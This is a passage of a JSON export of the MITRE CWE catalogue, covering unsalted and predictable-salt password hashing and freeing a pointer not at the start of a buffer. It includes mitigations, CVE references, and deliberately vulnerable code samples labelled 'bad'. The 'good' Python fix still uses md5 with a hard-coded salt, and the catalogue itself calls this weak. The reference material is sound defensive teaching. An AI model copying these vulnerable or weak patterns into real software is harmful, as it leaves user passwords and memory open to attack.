occurs.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-1902","Description":"Change in C compiler behavior causes resultant buffer overflows in programs that depend on behaviors that were undefined in the C standard.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1902"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR32-C","Entry_Name":"Ensure size arguments for variable length arrays are in a valid range","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP30-C","Entry_Name":"Do not depend on the order of evaluation for side effects","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP33-C","Entry_Name":"Do not read uninitialized memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT34-C","Entry_Name":"Do not shift an expression by a negative number of bits or by greater than or equal to the number of bits that exist in the operand","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC14-C","Entry_Name":"Do not introduce unnecessary platform dependencies"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC15-C","Entry_Name":"Do not depend on undefined behavior"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC37-C","Entry_Name":"Ensure that control never reaches the end of a non-void function","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"759":{"attr":{"@_ID":"759","@_Name":"Use of a One-Way Hash without a Salt","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software does not also use a salt as part of the input.","Extended_Description":{"xhtml:p":["This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables.","It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"916","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If an attacker can gain access to the hashes, then the lack of a salt makes it easier to conduct brute force attacks using techniques such as rainbow tables."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password.","Effectiveness":"Limited","Effectiveness_Notes":"Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware."},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759)."},{"Intro_Text":"In this example, a new user provides a new username and password to create an account. The program hashes the new user\'s password then stores it in a database.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def storePassword(userName,Password):","xhtml:div":{"#text":"hasher = hashlib.new(\'md5\')hasher.update(Password)hashedPassword = hasher.digest()return updateUserLogin(userName,hashedPassword)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":"# UpdateUserLogin returns True on success, False otherwise"}}},{"attr":{"@_Nature":"good","@_Language":"Python"},"xhtml:div":{"#text":"def storePassword(userName,Password):","xhtml:div":{"#text":"hasher = hashlib.new(\'md5\',b\'SaltGoesHere\')hasher.update(Password)hashedPassword = hasher.digest()return updateUserLogin(userName,hashedPassword)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:i":"# UpdateUserLogin returns True on success, False otherwise"}}}],"Body_Text":["While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised.","Fixing this is as simple as providing a salt to the hashing function on initialization:","Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1526","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526"},{"Reference":"CVE-2006-1058","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-633"}},{"attr":{"@_External_Reference_ID":"REF-634"}},{"attr":{"@_External_Reference_ID":"REF-635"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "Creating a Salted Hash" Page 302"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Salt Values", Page 46"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"760":{"attr":{"@_ID":"760","@_Name":"Use of a One-Way Hash with a Predictable Salt","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software uses a predictable salt as part of the input.","Extended_Description":{"xhtml:p":["This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide.","It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"916","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"In cryptography, salt refers to some random addition of data to an input before hashing to make dictionary attacks more difficult."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"If a technique that requires extra computational effort can not be implemented, then for each password that is processed, generate a new random salt using a strong random number generator with unpredictable seeds. Add the salt to the plaintext password before hashing it. When storing the hash, also store the salt. Do not use the same salt for every password.","Effectiveness":"Limited","Effectiveness_Notes":"Be aware that salts will not reduce the workload of a targeted attack against an individual hash (such as the password for a critical person), and in general they are less effective than other hashing techniques such as increasing the computation time or memory overhead. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing and GPU, ASIC, or FPGA hardware."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2002-1657","Description":"Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657"},{"Reference":"CVE-2001-0967","Description":"Server uses a constant salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-633"}},{"attr":{"@_External_Reference_ID":"REF-634"}},{"attr":{"@_External_Reference_ID":"REF-635"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "Creating a Salted Hash" Page 302"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Salt Values", Page 46"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"761":{"attr":{"@_ID":"761","@_Name":"Free of Pointer not at Start of Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer.","Extended_Description":{"xhtml:p":["This can cause the application to crash, or in some cases, modify critical program variables or execute code.","This weakness often occurs when the memory is allocated explicitly on the heap with one of the malloc() family functions and free() is called, but pointer arithmetic has caused the pointer to be in the interior or end of the buffer."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"763","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When utilizing pointer arithmetic to traverse a buffer, use a separate variable to track progress through memory and preserve the originally allocated address for later freeing."},{"Phase":"Implementation","Description":"When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-77"},"Intro_Text":"In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded \\"Search Me!\\" string and a constant string length of 20.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int contains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( *str != NULL){}free(str);return FAILURE;","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( *str == c ){}str = str + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int cointains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( i < strlen(str) ){}free(str);return FAILURE;","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( str[i] == c ){}i = i + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}}],"Body_Text":["However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it.","Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing."]},{"attr":{"@_Demonstrative_Example_ID":"DX-78"},"Intro_Text":"This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \\\\0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&inputstring, \\" \\\\t\\")) != NULL;)/.../free(ap[4]);","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (**ap != \'\\\\0\')","xhtml:div":{"#text":"if (++ap >= &argv[10])","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}}}},"Body_Text":"Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring."},{"attr":{"@_Demonstrative_Example_ID":"DX-79"},"Intro_Text":"Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( isMalformed( tok ) ){}else{}tok = strtok( NULL, sep));","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free( tok );","xhtml:br":["",""],"xhtml:i":"/* ignore and discard bad data */"}},{"#text":"add_to_command_queue( tok );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = \\" \\\\t\\";get_user_input( input );tok = 